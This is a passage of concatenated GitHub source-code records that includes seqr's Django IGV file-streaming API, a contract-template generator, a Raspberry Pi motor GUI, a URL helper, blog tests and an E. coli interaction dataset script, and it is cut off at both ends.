data:\n s = sorted([int(j) for j in i])\n if (all([n == 300 for n in s ])) or (sum(s) % 25 == 0):\n print(s)\n c += 1\n\n\nprint(c)\n\nif all(n == 300 for n in [300, 300]):\n print('yep')","repo_name":"danilinkp/EGE_tasks","sub_path":"9/9 из щелчка/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33906883504","text":"from collections import defaultdict\nimport json\nimport re\nimport requests\n\nfrom django.http import StreamingHttpResponse, HttpResponse\n\nfrom seqr.models import Individual, IgvSample\nfrom seqr.utils.file_utils import file_iter, does_file_exist, is_google_bucket_file_path, run_command, get_google_project\nfrom seqr.utils.redis_utils import safe_redis_get_json, safe_redis_set_json\nfrom seqr.views.utils.file_utils import save_uploaded_file\nfrom seqr.views.utils.json_to_orm_utils import get_or_create_model_from_json\nfrom seqr.views.utils.json_utils import create_json_response\nfrom seqr.views.utils.orm_to_json_utils import get_json_for_sample\nfrom seqr.views.utils.permissions_utils import get_project_and_check_permissions, \\\n check_project_permissions, \\\n login_and_policies_required, pm_or_data_manager_required, service_account_access\n\nGS_STORAGE_ACCESS_CACHE_KEY = 'gs_storage_access_cache_entry'\nGS_STORAGE_URL = 'https://storage.googleapis.com'\nCLOUD_STORAGE_URLS = {\n 's3': 'https://s3.amazonaws.com',\n 'gs': GS_STORAGE_URL,\n}\n\n\ndef _post_process_igv_records(project, individual_dataset_mapping, filename):\n info = []\n\n matched_individuals = Individual.objects.filter(family__project=project,\n individual_id__in=individual_dataset_mapping.keys())\n unmatched_individuals = set(individual_dataset_mapping.keys()) - {i.individual_id\n for i in\n matched_individuals}\n if len(unmatched_individuals) > 0:\n raise Exception('The following Individual IDs do not exist: {}'.format(\n \", \".join(unmatched_individuals)))\n\n info.append('Parsed {} rows in {} individuals from {}'.format(\n sum([len(rows) for rows in individual_dataset_mapping.values()]),\n len(individual_dataset_mapping), filename))\n\n existing_sample_files = defaultdict(set)\n for sample in IgvSample.objects.select_related('individual').filter(\n individual__in=matched_individuals):\n existing_sample_files[sample.individual.individual_id].add(sample.file_path)\n\n unchanged_rows = set()\n for individual_id, updates in individual_dataset_mapping.items():\n unchanged_rows.update([\n (individual_id, update['filePath']) for update in updates\n if update['filePath'] in existing_sample_files[individual_id]\n ])\n\n if unchanged_rows:\n info.append('No change detected for {} rows'.format(len(unchanged_rows)))\n\n all_updates = []\n for i in matched_individuals:\n all_updates += [\n dict(individualGuid=i.guid, **update) for update in\n individual_dataset_mapping[i.individual_id]\n if (i.individual_id, update['filePath']) not in unchanged_rows\n ]\n\n return info, all_updates\n\n@pm_or_data_manager_required\ndef receive_igv_table_handler(request, project_guid):\n project = get_project_and_check_permissions(project_guid, request.user, can_edit=True)\n\n def _process_alignment_records(rows, **kwargs):\n invalid_row = next((row for row in rows if not 2 <= len(row) <= 3), None)\n if invalid_row:\n raise ValueError(\"Must contain 2 or 3 columns: \" + ', '.join(invalid_row))\n parsed_records = defaultdict(list)\n for row in rows:\n parsed_records[row[0]].append({'filePath': row[1], 'sampleId': row[2] if len(row)> 2 else None})\n return parsed_records\n\n try:\n uploaded_file_id, filename, individual_dataset_mapping = save_uploaded_file(request, process_records=_process_alignment_records)\n\n info, all_updates = _post_process_igv_records(project, individual_dataset_mapping, filename)\n except Exception as e:\n return create_json_response({'errors': [str(e)]}, status=400)\n\n response = {\n 'updates': all_updates,\n 'uploadedFileId': uploaded_file_id,\n 'errors': [],\n 'info': info,\n }\n return create_json_response(response)\n\n\nSAMPLE_TYPE_MAP = [\n ('bam', IgvSample.SAMPLE_TYPE_ALIGNMENT),\n ('cram', IgvSample.SAMPLE_TYPE_ALIGNMENT),\n ('bigWig', IgvSample.SAMPLE_TYPE_COVERAGE),\n ('junctions.bed.gz', IgvSample.SAMPLE_TYPE_JUNCTION),\n ('bed.gz', IgvSample.SAMPLE_TYPE_GCNV),\n]\n\n\n@pm_or_data_manager_required\ndef update_individual_igv_sample(request, individual_guid):\n return update_individual_igv_sample_base(request, individual_guid)\n\n\ndef update_individual_igv_sample_base(request, individual_guid):\n individual = Individual.objects.get(guid=individual_guid)\n project = individual.family.project\n check_project_permissions(project, request.user, can_edit=True)\n\n request_json = json.loads(request.body)\n\n try:\n file_path = request_json.get('filePath')\n if not file_path:\n raise ValueError('request must contain fields: filePath')\n\n sample_type = next((st for suffix, st in SAMPLE_TYPE_MAP if file_path.endswith(suffix)), None)\n if not sample_type:\n raise Exception('Invalid file extension for \"{}\" - valid extensions are {}'.format(\n file_path, ', '.join([suffix for suffix, _ in SAMPLE_TYPE_MAP])))\n if not does_file_exist(file_path, user=request.user):\n raise Exception('Error accessing \"{}\"'.format(file_path))\n\n sample, created = get_or_create_model_from_json(\n IgvSample, create_json={'individual': individual, 'sample_type': sample_type},\n update_json={'file_path': file_path, 'sample_id': request_json.get('sampleId')}, user=request.user)\n\n response = {\n 'igvSamplesByGuid': {\n sample.guid: get_json_for_sample(sample, individual_guid=individual_guid, family_guid=individual.family.guid, project_guid=project.guid)}\n }\n if created:\n response['individualsByGuid'] = {\n individual.guid: {'igvSampleGuids': [s.guid for s in individual.igvsample_set.all()]}\n }\n return create_json_response(response)\n except Exception as e:\n error = str(e)\n return create_json_response({'error': error}, status=400, reason=error)\n\n\n@login_and_policies_required\ndef fetch_igv_track(request, project_guid, igv_track_path):\n\n get_project_and_check_permissions(project_guid, request.user)\n\n if igv_track_path.endswith('.bam.bai') and not does_file_exist(igv_track_path, user=request.user):\n igv_track_path = igv_track_path.replace('.bam.bai', '.bai')\n\n if is_google_bucket_file_path(igv_track_path):\n return _stream_gs(request, igv_track_path)\n\n return _stream_file(request, igv_track_path)\n\n\ndef _stream_gs(request, gs_path):\n headers = _get_gs_rest_api_headers(request.META.get('HTTP_RANGE'), gs_path, user=request.user)\n\n response = requests.get(\n f\"{GS_STORAGE_URL}/{gs_path.replace('gs://', '', 1)}\",\n headers=headers,\n stream=True)\n\n return StreamingHttpResponse(response.iter_content(chunk_size=65536), status=response.status_code,\n content_type='application/octet-stream')\n\n\ndef _get_gs_rest_api_headers(range_header, gs_path, user=None):\n headers = {'Authorization': 'Bearer {}'.format(_get_access_token(user))}\n if range_header:\n headers['Range'] = range_header\n google_project = get_google_project(gs_path)\n if google_project:\n headers['x-goog-user-project'] = get_google_project(gs_path)\n\n return headers\n\n\ndef _get_token_expiry(token):\n response = requests.post('https://www.googleapis.com/oauth2/v1/tokeninfo',\n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n data='access_token={}'.format(token))\n if response.status_code == 200:\n result = json.loads(response.text)\n return result['expires_in']\n else:\n return 0\n\n\ndef _get_access_token(user):\n access_token = safe_redis_get_json(GS_STORAGE_ACCESS_CACHE_KEY)\n if not access_token:\n process = run_command('gcloud auth print-access-token', user=user)\n if process.wait() == 0:\n access_token = next(process.stdout).decode('utf-8').strip()\n expires_in = _get_token_expiry(access_token)\n safe_redis_set_json(GS_STORAGE_ACCESS_CACHE_KEY, access_token, expire=expires_in-5)\n return access_token\n\n\ndef _stream_file(request, path):\n # based on https://gist.github.com/dcwatson/cb5d8157a8fa5a4a046e\n content_type = 'application/octet-stream'\n range_header = request.META.get('HTTP_RANGE', None)\n if range_header:\n range_match = re.compile(r'bytes\\s*=\\s*(\\d+)\\s*-\\s*(\\d*)', re.I).match(range_header)\n first_byte, last_byte = range_match.groups()\n first_byte = int(first_byte) if first_byte else 0\n last_byte = int(last_byte)\n length = last_byte - first_byte + 1\n resp = StreamingHttpResponse(\n file_iter(path, byte_range=(first_byte, last_byte), raw_content=True, user=request.user), status=206, content_type=content_type)\n resp['Content-Length'] = str(length)\n resp['Content-Range'] = 'bytes %s-%s' % (first_byte, last_byte)\n else:\n resp = StreamingHttpResponse(file_iter(path, raw_content=True, user=request.user), content_type=content_type)\n resp['Accept-Ranges'] = 'bytes'\n return resp\n\n\ndef igv_genomes_proxy(request, cloud_host, file_path):\n # IGV does not properly set CORS header and cannot directly access the genomes resource from the browser without\n # using this server-side proxy\n headers = {}\n range_header = request.META.get('HTTP_RANGE')\n if range_header:\n headers['Range'] = range_header\n\n genome_response = requests.get(f'{CLOUD_STORAGE_URLS[cloud_host]}/{file_path}', headers=headers)\n proxy_response = HttpResponse(\n content=genome_response.content,\n status=genome_response.status_code,\n )\n return proxy_response\n\n\n@service_account_access\ndef sa_get_igv_updates_required(request, project_guid):\n project = get_project_and_check_permissions(project_guid, request.user, can_edit=True)\n json_body = json.loads(request.body)\n json_records = json_body.get('mapping')\n\n info, all_updates = _post_process_igv_records(\n project, json_records, ''\n )\n\n # I was initially looking to completely merge this in, except the call is slow\n # and I genuinely think the request will time out, so make the caller do the\n # spacing out.\n return create_json_response({\n 'updates': all_updates,\n 'errors': [],\n 'info': info,\n })\n\n@service_account_access\ndef sa_update_igv_individual(request, individual_guid):\n return update_individual_igv_sample_base(request, individual_guid)\n","repo_name":"populationgenomics/seqr","sub_path":"seqr/views/apis/igv_api.py","file_name":"igv_api.py","file_ext":"py","file_size_in_byte":10786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"37427455981","text":"import pandas as pd\nimport numpy as np\nimport re, os, camelot\nfrom PyPDF2 import PdfFileReader\nfrom pathlib import Path\nimport numpy\nfrom docxtpl import DocxTemplate\n\ndef getDateText(date_format_num):\n months = [\n '',\n 'Enero', \n 'Febrero',\n 'Marzo',\n 'Abril',\n 'Mayo',\n 'Junio',\n 'Julio',\n 'Agosto',\n 'Septiembre',\n 'Octubre',\n 'Noviembre',\n 'Diciembre']\n date_credit_num = date_format_num.split('/')\n # print(date_credit_num)\n return date_credit_num[0] + ' de ' + months[int(str(date_credit_num[1]))] + ' de ' + date_credit_num[2]\n\ndef number_text(number):\n from nlt import numlet as nl\n number_text = '{:,.2f}'.format(number)\n return \"$ {} ({} PESOS {}/100 M.N.)\".format(\n number_text,\n nl.Numero(int(number)).a_letras.upper(),\n str(number_text).split('.')[1])\n\n\ndef generateContract(dir_csv, inputs_files, ouput_files, date_generate):\n\n datacsv = pd.read_csv(dir_csv,encoding = 'utf-8')\n\n files = inputs_files # route to find files PDF\n dirFiles = os.listdir(files) # list files in route\n\n CREDIT = None\n CLIENT_NAME = None\n CLIENT_RFC = None\n ANTEC_DATE = None\n ANTEC_CREDIT = None\n ANTEC_AMOUNT = None\n ENGINE = None\n SERIE = None\n BRAND = None\n MODEL = None\n COLOUR = None\n AMOUNT_OWED = None\n REFERENCE = None\n ADDRESS = None\n N_END_PAY = None\n END_DATE_PAY = None\n BULLET = None\n LETTER_COND = False\n AMOUNT_MONTH = None\n DATE = date_generate \n NUMBER_CLIENT = None \n TYPE_LAYOUT = None\n\n # data frame\n dfs = []\n\n for fichero in dirFiles: # each file to do\n\n # print(fichero)\n\n ficheropath = os.path.join(files, fichero) # complete route of file\n\n if os.path.isfile(ficheropath) and (fichero.endswith('.pdf') or fichero.endswith('.PDF')): # validate PDF\n\n temp = open(os.path.join(files, fichero), 'rb')\n PDF_read = PdfFileReader(temp)\n first_page = PDF_read.getPage(0)\n text = str(first_page.extractText()) # get text of file\n\n parts = text.split()\n start_amount = text.find('$')\n end_amount = text.find('M.N.')\n AMOUNTPAY = text[start_amount: end_amount+5]\n\n # Find number of credit in document\n start_credit = text.find('1-7200')\n CREDIT = text[start_credit:start_credit+11]\n\n # Search name of cliente with number of credit\n for i in datacsv.index:\n if str(CREDIT).strip() == datacsv['CREDITO'][i]:\n CLIENT_NAME = str(datacsv['NOMBRE'][i]).strip()\n AMOUNT_OWED = AMOUNTPAY # str(datacsv['ADEUDO'][i]).strip()\n CLIENT_RFC = str(datacsv['RFC'][i]).strip()\n NUMBER_CLIENT = str(datacsv['CLIENTE'][i]).strip()\n ANTEC_CREDIT = datacsv['CTO_ANT'][i]\n ANTEC_AMOUNT = number_text(float(datacsv['MON_CTO_ANT'][i])) #datacsv['MON_CTO_ANT'][i]\n ANTEC_DATE = getDateText(datacsv['FECHA_CTO_ANT'][i])\n ENGINE = str(datacsv['MOTOR'][i]).strip()\n SERIE = str(datacsv['VIN'][i]).strip()\n BRAND = str(datacsv['MARCA'][i]).strip()\n MODEL = str(datacsv['MODELO'][i]).strip()\n COLOUR = str(datacsv['COLOR'][i]).strip()\n REFERENCE = str(datacsv['REFERENCIA'][i]).zfill(11)\n ADDRESS = str(datacsv['DOMICILIO'][i]).strip()\n TYPE_LAYOUT = str(datacsv['VENTA'][i]).strip()\n\n tables = camelot.read_pdf(os.path.join(files, fichero)) # find tables in PDF\n df = tables[0].df # in the pays, the tables is in first page\n df_out = pd.DataFrame(df) \n # print(df_out)\n # get number of pay\n pay = re.split(\"\\\\n| \", df_out[0][1])\n # get date of pay\n dates = re.split(\"\\\\n| \", df_out[1][1])\n # get month pay\n months = re.split(\"\\\\n| \", df_out[2][1])\n # generate table with the list \n table_data = []\n table_data.append(pay)\n table_data.append(dates)\n table_data.append(months)\n partial_income_table = []\n var = 0\n # build the data matrix, list of lists\n for i in range(len(table_data[0])):\n aux = []\n aux.append(table_data[0][i])\n aux.append(table_data[1][i])\n aux.append(table_data[2][i])\n partial_income_table.append(aux)\n var += float(str(table_data[2][i]).replace(\",\",\"\"))\n dataValues = []\n # iterate the matrix of values\n for row in partial_income_table:\n aux_dic = {} # crate the dictionary\n aux_dic['cols'] = row # add value 'list' with the key \n dataValues.append(aux_dic) # add dictionary in the list\n\n N_END_PAY = table_data[0][len(table_data[0])-1]\n END_DATE_PAY = getDateText(table_data[1][len(table_data[0])-1])\n BULLET = float(str(table_data[2][len(table_data[0])-1]).replace(',',''))\n AMOUNT_MONTH = float(str(table_data[2][len(table_data[0])-2]).replace(',',''))\n\n context = {\n 'credit' : CREDIT,\n 'name' : CLIENT_NAME,\n 'client': NUMBER_CLIENT,\n 'antec_date':ANTEC_DATE,\n 'antec_credit':ANTEC_CREDIT,\n 'antec_amount':ANTEC_AMOUNT,\n 'engine':ENGINE,\n 'serie':SERIE,\n 'brand':BRAND,\n 'model':MODEL,\n 'colour':COLOUR,\n 'address':ADDRESS,\n 'rfc_client':CLIENT_RFC,\n 'amount_owed':AMOUNT_OWED,\n 'final_date':END_DATE_PAY,\n 'tbl_data' : dataValues,\n 'reference_banck':REFERENCE,\n 'date':DATE, \n 'carta_condonacion':LETTER_COND \n }\n \n if BULLET > AMOUNT_MONTH:\n context['carta_condonacion'] = True\n context['credit'] = CREDIT\n context['nmonths'] = N_END_PAY\n context['amount_month'] = number_text(AMOUNT_MONTH)\n context['condonation_amount'] = number_text(BULLET - AMOUNT_MONTH)\n\n fileDir = ouput_files\n\n try:\n os.stat(fileDir)\n except:\n os.mkdir(fileDir)\n\n if TYPE_LAYOUT == 'OSER':\n PRINCEPS_V2 = DocxTemplate('C:/Users/FINSUS-Admin/Documents/Code Projects/render-contracts/layouts/OSER CONVENIO DE RECONOCIMIENTO DE ADEUDO Y REESTRUCTURA V2.docx')\n PRINCEPS_V2.render(context)\n PRINCEPS_V2.save(fileDir + '/' + str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V2_' + \".docx\") \n print(str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V2_' + \".docx\")\n if TYPE_LAYOUT == 'GSJ':\n PRINCEPS_V2 = DocxTemplate('C:/Users/FINSUS-Admin/Documents/Code Projects/render-contracts/layouts/GSJ CONVENIO DE RECONOCIMIENTO DE ADEUDO Y REESTRUCTURA V2.docx')\n PRINCEPS_V2.render(context)\n PRINCEPS_V2.save(fileDir + '/' + str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V2_' + \".docx\")\n print(str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V2_' + \".docx\") \n if TYPE_LAYOUT == 'CARPENTUM':\n PRINCEPS_V2 = DocxTemplate('C:/Users/FINSUS-Admin/Documents/Code Projects/render-contracts/layouts/CARPENTUM CONVENIO DE RECONOCIMIENTO DE ADEUDO Y REESTRUCTURA V2.docx')\n PRINCEPS_V2.render(context)\n PRINCEPS_V2.save(fileDir + '/' + str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V3C_' + \".docx\")\n print(str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V3C_' + \".docx\") \n if TYPE_LAYOUT == 'MERICULTER':\n PRINCEPS_V2 = DocxTemplate('C:/Users/FINSUS-Admin/Documents/Code Projects/render-contracts/layouts/MERICULTER CONVENIO DE RECONOCIMIENTO DE ADEUDO Y REESTRUCTURA V2.docx')\n PRINCEPS_V2.render(context)\n PRINCEPS_V2.save(fileDir + '/' + str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V3M_' + \".docx\")\n print(str(CLIENT_NAME) + \"_\" + str(CREDIT) + \"_\" + str(int(AMOUNT_MONTH)) + 'PR_V3M_' + \".docx\") \n\n \n\nif __name__ == '__main__':\n\n dir_in_files = \"C:/Users/FINSUS-Admin/Documents/Contratos/13 de marzo\"\n\n dir_out_files = \"C:/Users/FINSUS-Admin/Documents/Contratos/13 de marzo\"\n\n dirCSVFile = 'C:/Users/FINSUS-Admin/Documents/PRINCEPS/Book2.csv'\n\n generateContract(dirCSVFile, dir_in_files, dir_out_files, '01 de marzo de 2023')\n\n \n\n # counter_amounts = 0 # len(table_data[0]) \n\n # # print(BULLET, ' ',counter_amounts, ' ', ncondonations, ' ', amount_condonation, ' ', BULLET_END)\n # # get number of condonations\n # for i in range(len(table_data[0])):\n # if int(i+1) % 4 == 0:\n # counter_amounts += 1\n # for i in range(len(table_data[0])):\n # if int(i+1) % 4 == 0:\n # print(i+1, table_data[1][i], round(float(BULLET) / counter_amounts, 2))\n # print(BULLET, counter_amounts)","repo_name":"GustavoBD-Dev/FINSUS-code","sub_path":"render-contracts/src/validate_pr2.py","file_name":"validate_pr2.py","file_ext":"py","file_size_in_byte":10497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13489108382","text":"import RPi.GPIO as GPIO\nimport tkinter as tk\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(11, GPIO.OUT)\nGPIO.setup(12, GPIO.OUT)\nGPIO.setup(15, GPIO.OUT)\nGPIO.setup(16, GPIO.OUT)\n\nTK = tk.Tk()\n\ndef FOR_M1():\n GPIO.output(11, GPIO.HIGH)\n GPIO.output(12, GPIO.LOW)\n\ndef REV_M1():\n GPIO.output(11, GPIO.LOW)\n GPIO.output(12, GPIO.HIGH)\ndef STOP_M1():\n GPIO.output(11, GPIO.LOW)\n GPIO.output(12, GPIO.LOW)\n\nNut_FOR_M1 = tk.Button(TK, height = 5,width = 15, text =\"FOR_M1\", command = FOR_M1)\nNut_REV_M1 = tk.Button(TK, height = 5,width = 15, text =\"REV_M1\", command = REV_M1)\nNut_STOP_M1 = tk.Button(TK, height = 5,width = 15, text =\"STOP_M1\", command = STOP_M1)\n\nNut_FOR_M1.pack()\nNut_REV_M1.pack()\nNut_STOP_M1.pack()\n\ndef FOR_M2():\n GPIO.output(15, GPIO.HIGH)\n GPIO.output(16, GPIO.LOW)\n\ndef REV_M2():\n GPIO.output(15, GPIO.LOW)\n GPIO.output(16, GPIO.HIGH)\ndef STOP_M2():\n GPIO.output(15, GPIO.LOW)\n GPIO.output(16, GPIO.LOW)\n\nNut_FOR_M2 = tk.Button(TK, height = 5,width = 15, text =\"FOR_M2\", command = FOR_M2)\nNut_REV_M2 = tk.Button(TK, height = 5,width = 15, text =\"REV_M2\", command = REV_M2)\nNut_STOP_M2 = tk.Button(TK, height = 5,width = 15, text =\"STOP_M2\", command = STOP_M2)\n\nNut_FOR_M2.pack()\nNut_REV_M2.pack()\nNut_STOP_M2.pack()\n\nTK.mainloop()\n","repo_name":"ductandev/do_an2","sub_path":"buoi2/vidu/cauh2motorgui.py","file_name":"cauh2motorgui.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9199182545","text":"puzzle = open(\"puzzle_input.txt\", \"r\")\ndata = puzzle.readlines()\nsum = 0\n\nfor bag in data:\n for j in range(0, int(len(bag)/2)):\n\n for k in range(int(len(bag)/2), int(len(bag))):\n\n if (bag[j] == bag[k] and bag[j] != \"_\"):\n\n if (64 < ord(bag[j]) < 91):\n sum += ord(bag[j])-38\n\n else:\n sum += ord(bag[j])-96\n\n bag = bag.replace(str(bag[j]), \"_\")\n\nprint(sum)\n","repo_name":"esrasrgl/AoC","sub_path":"y22/day3_1.py","file_name":"day3_1.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29291758256","text":"# -*- coding: utf-8 -*-\n\n\nfrom dp_tornado.engine.helper import Helper as dpHelper\n\ntry:\n import urllib.parse as _parse\nexcept:\n import urllib as _parse\n\ntry:\n import urlparse\nexcept ImportError:\n import urllib.parse as urlparse\n\n\nclass UrlParse(object):\n def __init__(self, request=None, scheme='', netloc='', path='', params=None, query=None, framgment=''):\n if request and 'X-Proxy-Prefix' in request.headers:\n if path.startswith(request.headers['X-Proxy-Prefix']):\n path = path[(len(request.headers['X-Proxy-Prefix']) - 1):]\n\n self.request = request\n self.scheme = scheme\n self.netloc = netloc\n self.path = path\n self.params = params or {}\n self.query = query or {}\n self.fragment = framgment\n\n def __str__(self):\n return ('scheme=%s, netloc=%s, path=%s, params=%s, query=%s, fragment=%s'\n % (self.scheme, self.netloc, self.path, self.params, self.query, self.fragment))\n\n\nclass UrlHelper(dpHelper):\n @property\n def urlparse(self):\n return urlparse\n\n def quote(self, s):\n if self.helper.system.py_version <= 2:\n return _parse.quote_plus(s)\n else:\n return _parse.quote_plus(s)\n\n def build(self, url, params):\n if self.helper.system.py_version <= 2:\n return '%s%s%s' % (url, '?' if params else '', _parse.urlencode(params))\n else:\n return '%s%s%s' % (url, '?' if params else '', _parse.urlencode(params))\n\n def urlencode(self, string):\n import requests.utils\n\n return requests.utils.quote(string)\n\n def parse(self, request):\n if self.helper.string.is_str(request):\n uri = self.helper.string.to_str(request)\n request = None\n else:\n uri = request.uri\n request = request\n\n if self.helper.system.py_version <= 2:\n p = urlparse.urlparse(uri)\n query = dict(urlparse.parse_qsl(p.query, keep_blank_values=True))\n else:\n p = _parse.urlparse(uri)\n query = dict(_parse.parse_qsl(p.query, keep_blank_values=True))\n\n return UrlParse(request, p.scheme, p.netloc, p.path, p.params, query, p.fragment)\n","repo_name":"leadermin/dp-tornado","sub_path":"dp_tornado/helper/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"29672941933","text":"from unittest import TestCase\nfrom blog import Blog\n\nclass BlogTest(TestCase):\n def test_create_posts(self):\n b = Blog('Test Title', 'Test Author')\n b.create_post('Test Post Title', 'Test Post Content')\n expected = 'Title: Test Title by Author: Test Author (1 post)'\n\n self.assertEqual(expected,b.__repr__())\n self.assertEqual(b.posts[0].title, 'Test Post Title')\n self.assertEqual(b.posts[0].content, 'Test Post Content')\n\n def test_json_no_posts(self):\n b = Blog('Test Title', 'Test Author')\n expected = {\n 'title': 'Test Title',\n 'author': 'Test Author',\n 'posts': []}\n\n self.assertDictEqual(expected,b.json())\n\n def test_json(self):\n b = Blog('Test Title', 'Test Author')\n b.create_post('Test Post Title', 'Test Post Content')\n\n expected = {\n 'title': 'Test Title',\n 'author': 'Test Author',\n 'posts': [{\n 'title': 'Test Post Title',\n 'content': 'Test Post Content'\n }]\n }\n\n self.assertDictEqual(expected, b.json())\n\n\n","repo_name":"katieqa/blog2","sub_path":"tests/integration/blog_test.py","file_name":"blog_test.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31882263141","text":"import csv\nimport numpy as np\nfrom collections import Counter\nfrom imblearn.under_sampling import RandomUnderSampler\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport sys\n\nsubsys= sys.argv[1]\nif subsys== 'cpgb':\n subsys_mets_file= './ecoli/ecoli_CPGB_mets.csv'\n subsys_genes_file= './ecoli/ecoli_CPGB_genes.csv'\nif subsys== 'acm':\n subsys_mets_file='./ecoli/ecoli_ACM_mets.csv'\n subsys_genes_file= './ecoli/ecoli_ACM_genes.csv'\n\n\ndef make_float(a):\n temp= []\n for i in a:\n temp_row= []\n for j in i:\n if j == '':\n temp_row.append(np.nan)\n else:\n temp_row.append(float(j))\n temp.append(temp_row)\n return np.array(temp)\n\n\ndef read_file(file_name):\n data= []\n with open(file_name, 'r') as file:\n reader= csv.reader(file, delimiter= ',')\n for row in reader:\n data.append(row)\n data= np.array(data)\n names= data[:, 0].reshape(-1,1)\n features= data[:, 1:].astype('str')\n\n return names, make_float(features)\n\n\ndef make_unique_without_zeros(features, decimal_points):\n unique_features_set= []\n for j in range(features.shape[1]):\n feature_set= []\n for i in range(features.shape[0]):\n feature_set.append(round(features[i][j], decimal_points))\n if all(x == 0 for x in feature_set):\n continue\n if feature_set not in unique_features_set:\n unique_features_set.append(feature_set)\n return np.array(unique_features_set).transpose()\n\n\ndef read_stitch_interaction_file(file_name, met_names, gene_names, confidence_score):\n interactions= dict()\n with open(file_name, 'r') as file:\n reader= csv.reader(file, delimiter= \"\\t\")\n next(reader, None)\n for row in reader:\n met= row[0]\n if \"CIDm\" in met:\n met= met.replace(\"CIDm\", \"\")\n elif \"CIDs\" in met:\n met= met.replace(\"CIDs\", \"\")\n met= str(int(met))\n gene= row[1].split(\".\")[1]\n if met in met_names and gene in gene_names:\n if int(row[2]) >= confidence_score:\n interaction= 1\n else:\n interaction= 0\n interactions[(met, gene)]= interaction\n return interactions\n\n\ndef delete_redundant_entries(names, features):\n unique_names= []\n for name in names:\n if name[0] not in unique_names:\n unique_names.append(name[0])\n new_names=[]\n new_features= []\n for name in unique_names:\n temp= []\n for index, entry in enumerate(names.reshape(-1)):\n if name == entry:\n temp.append(features[index])\n summation= temp[0]\n count= len(temp)\n for x in temp[1:]:\n summation+=x\n temp= summation/count\n\n new_names.append(name)\n new_features.append(temp)\n return np.array(new_names).reshape(-1, 1), np.array(new_features)\n\n\n\ndef read_specified_file(filename, target, decimal_point):\n names, features= read_file(filename)\n features= make_unique_without_zeros(features, decimal_point)\n names, features= delete_redundant_entries(names, features)\n\n new_names= []\n new_features= []\n for entry in target:\n for index, name in enumerate(names):\n if entry == name[0]:\n new_names.append(entry)\n new_features.append(features[index])\n return np.array(new_names).reshape(-1, 1), np.array(new_features)\n\n\ndef make_dataset(met_names, met_features, gene_names, gene_features, gold_standard, confidence_score):\n\n met_names= met_names.transpose()[0].tolist()\n gene_names= gene_names.transpose()[0].tolist()\n\n interactions= dict()\n\n\n interactions= read_stitch_interaction_file('./511145.protein_chemical.links.v5.0.tsv',\n met_names, gene_names, confidence_score)\n\n\n dataset= np.zeros(( met_features.shape[1]+ gene_features.shape[1]+ 1))\n for i, m in enumerate(met_names):\n temp = []\n for j, p in enumerate(gene_names):\n if (m, p) in interactions:\n interaction= interactions[(m, p)]\n else:\n interaction= 0\n l= met_features[i].tolist()\n l.extend(gene_features[j])\n l.append(interaction)\n\n temp.append(l)\n dataset= np.vstack((dataset, np.array(temp)))\n\n dataset= np.delete(dataset, 0, axis= 0)\n print(\"Dataset shape:\\t\", dataset.shape)\n\n X= dataset[:, :-1]\n y= dataset[:, -1]\n\n print(\"X shape:\\t\", X.shape, \"\\ny shape:\\t\", y.shape)\n return X, y\n\ndef make_dataset_exception(met_names, met_features, gene_names, gene_features, gold_standard, confidence_score, exceptions):\n\n met_names= met_names.transpose()[0].tolist()\n gene_names= gene_names.transpose()[0].tolist()\n\n interactions= dict()\n\n interactions= read_stitch_interaction_file('./511145.protein_chemical.links.v5.0.tsv', met_names, gene_names, confidence_score)\n\n\n dataset= np.zeros(( met_features.shape[1]+ gene_features.shape[1]+ 1))\n for i, m in enumerate(met_names):\n temp = []\n for j, p in enumerate(gene_names):\n if (m, p) not in exceptions:\n if (m, p) in interactions:\n interaction= interactions[(m, p)]\n else:\n interaction= 0\n l= met_features[i].tolist()\n l.extend(gene_features[j])\n l.append(interaction)\n\n temp.append(l)\n dataset= np.vstack((dataset, np.array(temp)))\n\n dataset= np.delete(dataset, 0, axis= 0)\n print(\"Dataset shape:\\t\", dataset.shape)\n\n X= dataset[:, :-1]\n y= dataset[:, -1]\n\n print(\"X shape:\\t\", X.shape, \"\\ny shape:\\t\", y.shape)\n return X, y\n\n\ndef make_dataset_exact(met_names, met_features, gene_names, gene_features, gold_standard, confidence_score, exacts):\n\n met_names= met_names.transpose()[0].tolist()\n gene_names= gene_names.transpose()[0].tolist()\n\n interactions= dict()\n\n interactions= read_stitch_interaction_file('./511145.protein_chemical.links.v5.0.tsv', met_names, gene_names, confidence_score)\n\n\n dataset= np.zeros(( met_features.shape[1]+ gene_features.shape[1]+ 1))\n for i, m in enumerate(met_names):\n temp = []\n flag= False\n for j, p in enumerate(gene_names):\n if (m, p) in exacts:\n flag= True\n if (m, p) in interactions:\n interaction= interactions[(m, p)]\n else:\n interaction= 0\n l= met_features[i].tolist()\n l.extend(gene_features[j])\n 